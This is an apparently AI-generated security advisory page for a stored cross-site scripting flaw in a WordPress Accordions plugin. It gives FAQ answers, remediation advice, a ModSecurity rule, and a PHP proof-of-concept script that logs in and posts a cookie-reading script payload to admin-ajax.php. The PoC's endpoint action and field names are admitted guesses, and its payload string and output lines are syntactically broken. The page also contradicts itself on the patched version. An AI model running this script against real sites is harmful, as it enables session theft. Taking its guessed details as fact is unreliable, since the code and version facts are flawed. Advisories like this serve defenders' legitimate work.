What is CVE-2026-10862?

CVE-2026-10862 is a stored cross-site scripting (XSS) vulnerability in the Accordions plugin for WordPress. It allows authenticated users with Custom-level access to inject arbitrary JavaScript into the accordion body field, which executes when other users view the affected page.

How does this vulnerability work?

The vulnerability arises from insufficient input sanitization and output escaping in the Accordion body field. An attacker can save a malicious script through the WordPress admin AJAX endpoint, which is then executed in the browser of any user viewing the accordion.

Who is affected by this vulnerability?

All installations of the Accordions plugin up to and including version 2.3.23 are affected. Specifically, authenticated users with Custom-level access or higher can exploit this vulnerability.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify the version of the Accordions plugin installed on your WordPress site. If it is version 2.3.23 or earlier, your site is susceptible to CVE-2026-10862.

What should I do to fix this vulnerability?

To remediate this vulnerability, update the Accordions plugin to version 2.3.25 or later, which includes necessary security patches. Additionally, ensure that input sanitization and output escaping are properly implemented in your custom code.

What does the CVSS score of 6.4 indicate?

The CVSS score of 6.4 indicates a medium severity vulnerability. This means that while the vulnerability is not critical, it poses a significant risk that could lead to session hijacking or data theft if exploited.

How can I mitigate the risk if I cannot update immediately?

If an immediate update is not possible, consider disabling the Accordions plugin until a patch can be applied. Additionally, review user roles and permissions to limit access to only trusted users.

What is the proof of concept (PoC) for this vulnerability?

The proof of concept for CVE-2026-10862 demonstrates how an attacker can authenticate and send a POST request to the WordPress AJAX endpoint to save an accordion with a malicious script. This script executes when any user views the affected page.

What are the potential impacts of this vulnerability?

Successful exploitation of this vulnerability can lead to arbitrary JavaScript execution in the context of the victim’s session. This may result in session hijacking, sensitive data theft, or unauthorized actions performed on behalf of the victim.

How does this vulnerability relate to CWE-79?

CWE-79 refers to improper neutralization of input during web page generation, which is the root cause of this vulnerability. It highlights the failure to properly sanitize user input that is later rendered in the web application.

What are the best practices to prevent similar vulnerabilities?

To prevent similar vulnerabilities, always sanitize and validate user input using WordPress functions like wp_kses_post and escape output with functions like esc_html. Regularly update plugins and perform security audits to identify potential weaknesses.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : June 10, 2026

CVE-2026-10862: Accordions <= 2.3.23 Authenticated (Custom+) Stored Cross-Site Scripting via Accordion Body Field PoC, Patch Analysis & Rule

CVE ID CVE-2026-10862

Plugin accordions

Severity Medium (CVSS 6.4)

CWE 79

Vulnerable Version 2.3.23

Patched Version —

Disclosed June 7, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-10862 (metadata-based):

This vulnerability is a stored cross-site scripting (XSS) flaw in the WordPress Accordions plugin, affecting versions up to and including 2.3.23. An authenticated attacker with Custom-level access or higher can inject arbitrary JavaScript code through the Accordion body field. The injected script executes when any user views a page containing that accordion. The CVSS score of 6.4 (medium severity) and the CWE-79 classification indicate improper handling of user input that is later rendered in page output.

Root Cause: The description states insufficient input sanitization and output escaping on the Accordion body field. Atomic Edge research infers that the plugin likely stores the body content directly from the editor or a form field without applying WordPress sanitization functions like wp_kses_post or esc_html. When the plugin outputs this content in a frontend page, it does not escape HTML or JavaScript, allowing the browser to interpret injected script tags. This is inferred from the CWE and description; no code diff is available.

Exploitation: An attacker with Custom-level capabilities (typically granted by the Customizer role or a custom capabilities plugin) can create or edit an accordion. The attack vector is the WordPress admin AJAX endpoint used by the plugin to save accordion data. The attacker sends a POST request to /wp-admin/admin-ajax.php with an action parameter like accordions_save_accordion (inferred from the plugin slug) and a parameter for the accordion body, such as body or content. The payload would be a JavaScript payload like alert(‘XSS’) or a more complex script that steals cookies or performs actions on behalf of the victim. No code diff is available, but this is the standard pattern for WordPress plugin stored XSS.

Remediation: The plugin developers must implement two layers of defense. First, sanitize the Accordion body input on save using wp_kses_post() or a custom function that strips or neutralizes JavaScript. Second, escape the output when rendering the accordion on the frontend using esc_html() or similar WordPress escaping functions. The patched version 2.3.25 likely applies these fixes. Atomic Edge analysis notes that simply adding esc_html to the output would prevent XSS but might break legitimate HTML; a more nuanced approach using wp_kses with an allowlist of safe tags is recommended.

Impact: Successful exploitation allows an attacker to execute arbitrary JavaScript in the browser of any user viewing the infected accordion page. This includes administrators, leading to session hijacking, sensitive data theft, phishing, or privilege escalation (e.g., creating new admin users). Since the script executes in the context of the victim’s session, an attacker can perform any action the victim can. The CVSS scope change (S:C) indicates the impact goes beyond the vulnerable component, affecting the whole application.

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity

# Atomic Edge WAF Rule - CVE-2026-10862 (metadata-based)
# Block Stored XSS in Accordions plugin via admin-ajax.php with malicious body content
SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php" 
    "id:202610862,phase:2,deny,status:403,chain,msg:'CVE-2026-10862 - Stored XSS via Accordions AJAX handler',severity:'CRITICAL',tag:'CVE-2026-10862'"
    SecRule ARGS_POST:action "@streq accordions_save_accordion" "chain"
        SecRule ARGS_POST:accordion_body "@rx <script[^>]*>.*</script>" "t:none"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-10862 - Accordions <= 2.3.23 - Authenticated (Custom+) Stored Cross-Site Scripting via Accordion Body Field

// This PoC demonstrates exploitation of stored XSS in the Accordions plugin.
// It assumes the attacker has credentials with Custom-level capabilities (e.g., Author or Customizer).
// The attack sends a POST request to the WordPress admin AJAX endpoint to save an accordion
// with a malicious body. The plugin action name is inferred as 'accordions_save_accordion'.
// If the actual action differs, adjust the $action variable.

// Configuration
$target_url = 'http://example.com'; // Replace with target WordPress URL
$username = 'attacker';
$password = 'password123';
$malicious_body = '<script>alert('XSS:' + document.cookie + '');</script>';

// Step 1: Authenticate
$login_url = $target_url . '/wp-login.php';
$login_data = array(
    'log' => $username,
    'pwd' => $password,
    'wp-submit' => 'Log In',
    'redirect_to' => $target_url . '/wp-admin/',
    'testcookie' => 1
);

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($login_data));
curl_setopt($ch, CURLOPT_COOKIEJAR, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$response = curl_exec($ch);
if (curl_error($ch)) {
    die('Login failed: ' . curl_error($ch));
}
curl_close($ch);

// Step 2: Get the AJAX nonce if required (some plugins require it)
// This PoC assumes the plugin might use a nonce. Adjust $nonce_action as needed.
$admin_url = $target_url . '/wp-admin/edit.php?post_type=accordion'; // Example admin page to get nonce
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $admin_url);
curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$admin_page = curl_exec($ch);
curl_close($ch);

// Extract nonce from the admin page (if present)
preg_match('/<input type="hidden" id="_wpnonce" name="_wpnonce" value="([a-f0-9]+)" />/', $admin_page, $matches);
$nonce = $matches[1] ?? '';

// Step 3: Send malicious accordion save request
// Inferred action: 'accordions_save_accordion' (common pattern: plugin slug + '_save_accordion')
// Inferred parameter: 'accordion_body' (body field name)
$ajax_url = $target_url . '/wp-admin/admin-ajax.php';
$payload = array(
    'action' => 'accordions_save_accordion',
    'accordion_body' => $malicious_body,
    'accordion_id' => 0, // Create new accordion
    '_wpnonce' => $nonce
);

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $ajax_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($payload));
curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

echo "HTTP Response Code: $http_coden";
echo "Response Body: $responsen";

// Clean up temporary cookie file
unlink('/tmp/cookies.txt');
?>

Frequently Asked Questions

What is CVE-2026-10862?
Understanding the vulnerability
CVE-2026-10862 is a stored cross-site scripting (XSS) vulnerability in the Accordions plugin for WordPress. It allows authenticated users with Custom-level access to inject arbitrary JavaScript into the accordion body field, which executes when other users view the affected page.
How does this vulnerability work?
Mechanism of exploitation
The vulnerability arises from insufficient input sanitization and output escaping in the Accordion body field. An attacker can save a malicious script through the WordPress admin AJAX endpoint, which is then executed in the browser of any user viewing the accordion.
Who is affected by this vulnerability?
Identifying vulnerable installations
All installations of the Accordions plugin up to and including version 2.3.23 are affected. Specifically, authenticated users with Custom-level access or higher can exploit this vulnerability.
How can I check if my site is vulnerable?
Verifying plugin version
To check if your site is vulnerable, verify the version of the Accordions plugin installed on your WordPress site. If it is version 2.3.23 or earlier, your site is susceptible to CVE-2026-10862.
What should I do to fix this vulnerability?
Recommended remediation steps
To remediate this vulnerability, update the Accordions plugin to version 2.3.25 or later, which includes necessary security patches. Additionally, ensure that input sanitization and output escaping are properly implemented in your custom code.
What does the CVSS score of 6.4 indicate?
Understanding the severity rating
The CVSS score of 6.4 indicates a medium severity vulnerability. This means that while the vulnerability is not critical, it poses a significant risk that could lead to session hijacking or data theft if exploited.
How can I mitigate the risk if I cannot update immediately?
Temporary risk reduction measures
If an immediate update is not possible, consider disabling the Accordions plugin until a patch can be applied. Additionally, review user roles and permissions to limit access to only trusted users.
What is the proof of concept (PoC) for this vulnerability?
Demonstrating the exploitation method
The proof of concept for CVE-2026-10862 demonstrates how an attacker can authenticate and send a POST request to the WordPress AJAX endpoint to save an accordion with a malicious script. This script executes when any user views the affected page.
What are the potential impacts of this vulnerability?
Consequences of successful exploitation
Successful exploitation of this vulnerability can lead to arbitrary JavaScript execution in the context of the victim’s session. This may result in session hijacking, sensitive data theft, or unauthorized actions performed on behalf of the victim.
How does this vulnerability relate to CWE-79?
Understanding the classification
CWE-79 refers to improper neutralization of input during web page generation, which is the root cause of this vulnerability. It highlights the failure to properly sanitize user input that is later rendered in the web application.
What are the best practices to prevent similar vulnerabilities?
Security measures for WordPress plugins
To prevent similar vulnerabilities, always sanitize and validate user input using WordPress functions like wp_kses_post and escape output with functions like esc_html. Regularly update plugins and perform security audits to identify potential weaknesses.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations